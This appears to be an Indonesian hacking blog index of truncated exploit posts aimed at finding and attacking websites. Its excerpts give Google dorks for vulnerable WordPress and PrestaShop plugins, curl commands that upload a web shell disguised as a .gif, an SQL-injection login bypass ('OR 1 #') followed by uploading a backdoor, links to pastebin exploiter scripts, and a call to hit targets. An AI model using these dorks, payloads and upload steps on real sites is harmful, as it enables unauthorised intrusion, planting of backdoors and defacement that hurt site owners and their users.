Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user...
Exploit Title: WordPress Plugin Job Manager File UploadGoogle Dork: inurl:/wp-content/uploads/job-manager-uploads/Vuln Path: /jm-ajax/upload_fileExample:www.target.com/jm-ajax/upload_file/( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"Upload file anda dengan format .gif/.jpg/.pngScript:- https://pastebin.com/hp0jJr1g [PHP][CLI Based]- https://pastebin.com/FaACEDLg [BASH]Ayo kawan kita boom...
Exploit Title: WordPress Business Directory Plugin File UploadAuthor: Jingklong ( Bahari Trouble Maker )Google Dork: inurl:/wp-content/ inurl:/business-directory-pluginVuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-uploadExample Target:http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload( Vuln Target )Exploit:1. CSRF2. CURL POSTroot # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"Uplod file...
Google Dork: intext:"Powered By Nusiorung"Login Dengan Username & PasswordUsername : ' OR 1 #Password : ' OR 1 #Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.Setelah itu, klik kotak pada...
Baru baru ini ditemukan kerentanan pada PHPMailer yang memungkinkan attacker mendapatkan akses ke server melalui Remote Code Execution (RCE). PHPMailer sendiri merupakan salah satu library open source PHP populer untuk mengirim...
[+] Google Dork: inurl:"/modules/blocktestimonial/"[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php[+] Tutorial: - http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based ) Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....Silakan download exploiternya, lalu upload di shell/hosting...
